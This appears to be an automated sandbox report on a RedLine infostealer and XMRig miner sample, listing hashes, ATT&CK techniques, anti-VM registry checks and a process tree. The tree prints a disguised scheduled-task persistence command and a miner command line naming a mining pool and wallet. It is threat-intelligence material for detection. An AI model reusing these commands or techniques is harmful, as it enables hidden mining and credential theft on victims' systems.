redline | 677618666eb31c80e9dbecb17907676d2da2a39d24f7c20785ef577239ef5e6f

General

Target

TI.exe
Size

2.5MB
MD5

a5d3fdf55abb54ec0b632dee9d3459d4
SHA1

c177421eb77f0d341e5d1bd6cfbccb60e0c86a1c
SHA256

677618666eb31c80e9dbecb17907676d2da2a39d24f7c20785ef577239ef5e6f
SHA512

4faafc484d66545a3355ba4d76da6dd021b556a06ec5b15fa8b4b8a4f1161b44ffad5e654991cf658fc6bd49b458e59586155dfdf339e1150b278ff5b9a41324

Score

10^/10

redline xmrig discovery evasion infostealer miner spyware themida trojan

Malware Config

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3904-37-0x00007FF7B6530000-0x00007FF7B76E8000-memory.dmp	xmrig

Executes dropped EXE 4 IoCs

Processes:

1zjzhjbg.exei2sjufgt.execpu.exeRantimeBroker.exe

pid process

2760 1zjzhjbg.exe
2980 i2sjufgt.exe
3904 cpu.exe
904 RantimeBroker.exe

pid	process
2760	1zjzhjbg.exe
2980	i2sjufgt.exe
3904	cpu.exe
904	RantimeBroker.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

1zjzhjbg.exei2sjufgt.exeRantimeBroker.exeTI.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1zjzhjbg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	i2sjufgt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	i2sjufgt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RantimeBroker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RantimeBroker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1zjzhjbg.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

themida 9 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/496-5-0x0000000000950000-0x0000000000951000-memory.dmp	themida
C:\Users\Admin\AppData\Local\1zjzhjbg.exe	themida
behavioral2/memory/2760-12-0x00000000000E0000-0x00000000000E1000-memory.dmp	themida
C:\Users\Admin\AppData\Local\i2sjufgt.exe	themida
C:\Users\Admin\AppData\Local\i2sjufgt.exe	themida
behavioral2/memory/2980-23-0x0000000000250000-0x0000000000251000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Windows\RantimeBroker.exe	themida
C:\Users\Admin\AppData\Roaming\Windows\RantimeBroker.exe	themida
behavioral2/memory/904-52-0x0000000001380000-0x0000000001381000-memory.dmp	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

i2sjufgt.exeRantimeBroker.exeTI.exe1zjzhjbg.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	i2sjufgt.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RantimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	TI.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1zjzhjbg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

TI.exe1zjzhjbg.exei2sjufgt.exeRantimeBroker.exe

pid process

496 TI.exe
2760 1zjzhjbg.exe
2980 i2sjufgt.exe
904 RantimeBroker.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3476 schtasks.exe

pid	process
496	TI.exe
2760	1zjzhjbg.exe
2980	i2sjufgt.exe
904	RantimeBroker.exe

pid	process
3476	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

i2sjufgt.exe

pid	process
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe
2980	i2sjufgt.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

TI.exei2sjufgt.execpu.exe1zjzhjbg.exeRantimeBroker.exe

description	pid	process
Token: SeDebugPrivilege	496	TI.exe
Token: SeDebugPrivilege	2980	i2sjufgt.exe
Token: SeLockMemoryPrivilege	3904	cpu.exe
Token: SeLockMemoryPrivilege	3904	cpu.exe
Token: SeDebugPrivilege	2760	1zjzhjbg.exe
Token: SeDebugPrivilege	904	RantimeBroker.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

TI.exei2sjufgt.exe

description	pid	process	target process
PID 496 wrote to memory of 2760	496	TI.exe	1zjzhjbg.exe
PID 496 wrote to memory of 2760	496	TI.exe	1zjzhjbg.exe
PID 496 wrote to memory of 2760	496	TI.exe	1zjzhjbg.exe
PID 496 wrote to memory of 2980	496	TI.exe	i2sjufgt.exe
PID 496 wrote to memory of 2980	496	TI.exe	i2sjufgt.exe
PID 496 wrote to memory of 2980	496	TI.exe	i2sjufgt.exe
PID 2980 wrote to memory of 3476	2980	i2sjufgt.exe	schtasks.exe
PID 2980 wrote to memory of 3476	2980	i2sjufgt.exe	schtasks.exe
PID 2980 wrote to memory of 3476	2980	i2sjufgt.exe	schtasks.exe
PID 2980 wrote to memory of 3904	2980	i2sjufgt.exe	cpu.exe
PID 2980 wrote to memory of 3904	2980	i2sjufgt.exe	cpu.exe

C:\Users\Admin\AppData\Local\Temp\TI.exe
"C:\Users\Admin\AppData\Local\Temp\TI.exe"
1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:496

C:\Users\Admin\AppData\Local\1zjzhjbg.exe
"C:\Users\Admin\AppData\Local\1zjzhjbg.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2760

C:\Users\Admin\AppData\Local\i2sjufgt.exe
"C:\Users\Admin\AppData\Local\i2sjufgt.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2980

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Windows Service © Microsoft Corporation" /tr "C:\Users\Admin\AppData\Roaming\Windows\RantimeBroker.exe" /f
3⤵
- Creates scheduled task(s)
PID:3476

C:\Users\Admin\AppData\Roaming\Windows\CPU\cpu.exe
"C:\Users\Admin\AppData\Roaming\Windows\CPU\cpu.exe" -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3904

C:\Users\Admin\AppData\Roaming\Windows\RantimeBroker.exe
C:\Users\Admin\AppData\Roaming\Windows\RantimeBroker.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:904

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Virtualization/Sandbox Evasion

1

T1497

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

3

T1012

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\1zjzhjbg.exe
MD5
70dca411445d3b4394d9c467bf3ff994

SHA1
83f9120b2b184eb991d1dcbf4bb13d5f2f4a6097

SHA256
1d1f06c0d0965296755770b3f6a70a90e0d21a57ef5e47f9a26fcc4008ad45ef

SHA512
4a2f84a8fb4bb0eba8402eb417cadb8bcef6ac309ee4918a698cab756ea888ff076545e1ed02f85f5705fe15f7eb7ec01b68c3bc98f74b4e13f5b8e4f0184cd6

Download Submit
C:\Users\Admin\AppData\Local\i2sjufgt.exe
MD5
f0ecefed65b00699cc2b57bf81492f56

SHA1
4e0fbc13af6c373c9944a53a40965517b619c274

SHA256
83f953427624eaba72e6d34339b4004c3614657bfe9fb601eca7e76410b71325

SHA512
83bfdd06bf7e3497d6d0ec1686ede07d11003057919cdb74b3224e1deeb6dfa9259a83344c419ca0b2dec4cd42292c6047d842eeb09cf3459d6ac6c21130533f

Download Submit
C:\Users\Admin\AppData\Local\i2sjufgt.exe
MD5
f0ecefed65b00699cc2b57bf81492f56

SHA1
4e0fbc13af6c373c9944a53a40965517b619c274

SHA256
83f953427624eaba72e6d34339b4004c3614657bfe9fb601eca7e76410b71325

SHA512
83bfdd06bf7e3497d6d0ec1686ede07d11003057919cdb74b3224e1deeb6dfa9259a83344c419ca0b2dec4cd42292c6047d842eeb09cf3459d6ac6c21130533f

Download Submit
C:\Users\Admin\AppData\Roaming\Windows\CPU\cpu.exe
MD5
e95f766a3748042efbf0f05d823f82b7

SHA1
fa4a29f9b95f4491e07eba54a677d52d8d061a19

SHA256
1aef2fba4058ad80e4ae16dce0d2609e9f946ba9a4f2203891a26a92b3f6578c

SHA512
e4d61199b57ae189c2bef7adc661224cfb00e9d6b3526c07624911238aad2d81d9548b52db1c6dbbf4a0e3f766d57080d2414ca836e037f0bb39728d1f1af55c

Download Submit
C:\Users\Admin\AppData\Roaming\Windows\RantimeBroker.exe
MD5
f0ecefed65b00699cc2b57bf81492f56

SHA1
4e0fbc13af6c373c9944a53a40965517b619c274

SHA256
83f953427624eaba72e6d34339b4004c3614657bfe9fb601eca7e76410b71325

SHA512
83bfdd06bf7e3497d6d0ec1686ede07d11003057919cdb74b3224e1deeb6dfa9259a83344c419ca0b2dec4cd42292c6047d842eeb09cf3459d6ac6c21130533f

Download Submit
C:\Users\Admin\AppData\Roaming\Windows\RantimeBroker.exe
MD5
f0ecefed65b00699cc2b57bf81492f56

SHA1
4e0fbc13af6c373c9944a53a40965517b619c274

SHA256
83f953427624eaba72e6d34339b4004c3614657bfe9fb601eca7e76410b71325

SHA512
83bfdd06bf7e3497d6d0ec1686ede07d11003057919cdb74b3224e1deeb6dfa9259a83344c419ca0b2dec4cd42292c6047d842eeb09cf3459d6ac6c21130533f

Download Submit
memory/496-7-0x00000000054F0000-0x00000000054F1000-memory.dmp

Filesize
4KB

Download
memory/496-5-0x0000000000950000-0x0000000000951000-memory.dmp

Filesize
4KB

Download
memory/496-4-0x0000000073D40000-0x000000007442E000-memory.dmp

Filesize
6.9MB

Download
memory/496-3-0x0000000077C64000-0x0000000077C65000-memory.dmp

Filesize
4KB

Download
memory/904-51-0x0000000073D40000-0x000000007442E000-memory.dmp

Filesize
6.9MB

Download
memory/904-52-0x0000000001380000-0x0000000001381000-memory.dmp

Filesize
4KB

Download
memory/904-54-0x0000000005E60000-0x0000000005E61000-memory.dmp

Filesize
4KB

Download
memory/2760-40-0x00000000070A0000-0x00000000070A1000-memory.dmp

Filesize
4KB

Download
memory/2760-14-0x0000000003410000-0x0000000003411000-memory.dmp

Filesize
4KB

Download
memory/2760-8-0x0000000000000000-mapping.dmp

Download
memory/2760-25-0x0000000005D00000-0x0000000005D01000-memory.dmp

Filesize
4KB

Download
memory/2760-11-0x0000000073D40000-0x000000007442E000-memory.dmp

Filesize
6.9MB

Download
memory/2760-28-0x00000000034B0000-0x00000000034B1000-memory.dmp

Filesize
4KB

Download
memory/2760-12-0x00000000000E0000-0x00000000000E1000-memory.dmp

Filesize
4KB

Download
memory/2760-39-0x00000000069A0000-0x00000000069A1000-memory.dmp

Filesize
4KB

Download
memory/2760-31-0x0000000005730000-0x0000000005731000-memory.dmp

Filesize
4KB

Download
memory/2760-32-0x0000000005770000-0x0000000005771000-memory.dmp

Filesize
4KB

Download
memory/2760-33-0x00000000059B0000-0x00000000059B1000-memory.dmp

Filesize
4KB

Download
memory/2760-44-0x00000000087F0000-0x00000000087F1000-memory.dmp

Filesize
4KB

Download
memory/2760-20-0x0000000002EA0000-0x0000000002EA1000-memory.dmp

Filesize
4KB

Download
memory/2760-42-0x0000000007AD0000-0x0000000007AD1000-memory.dmp

Filesize
4KB

Download
memory/2760-41-0x0000000006B70000-0x0000000006B71000-memory.dmp

Filesize
4KB

Download
memory/2760-19-0x00000000033B0000-0x00000000033B1000-memory.dmp

Filesize
4KB

Download
memory/2980-30-0x00000000052C0000-0x00000000052C1000-memory.dmp

Filesize
4KB

Download
memory/2980-15-0x0000000000000000-mapping.dmp

Download
memory/2980-22-0x0000000073D40000-0x000000007442E000-memory.dmp

Filesize
6.9MB

Download
memory/2980-27-0x0000000005410000-0x0000000005411000-memory.dmp

Filesize
4KB

Download
memory/2980-23-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/3476-29-0x0000000000000000-mapping.dmp

Download
memory/3904-38-0x0000026E8E6B0000-0x0000026E8E6D0000-memory.dmp

Filesize
128KB

Download
memory/3904-37-0x00007FF7B6530000-0x00007FF7B76E8000-memory.dmp

Filesize
17.7MB

Download
memory/3904-36-0x0000026E8CCF0000-0x0000026E8CD04000-memory.dmp

Filesize
80KB

Download
memory/3904-34-0x0000000000000000-mapping.dmp

Download
memory/3904-45-0x0000026F20E30000-0x0000026F20E50000-memory.dmp

Filesize
128KB

Download
memory/3904-46-0x0000026F20E50000-0x0000026F20E70000-memory.dmp

Filesize
128KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads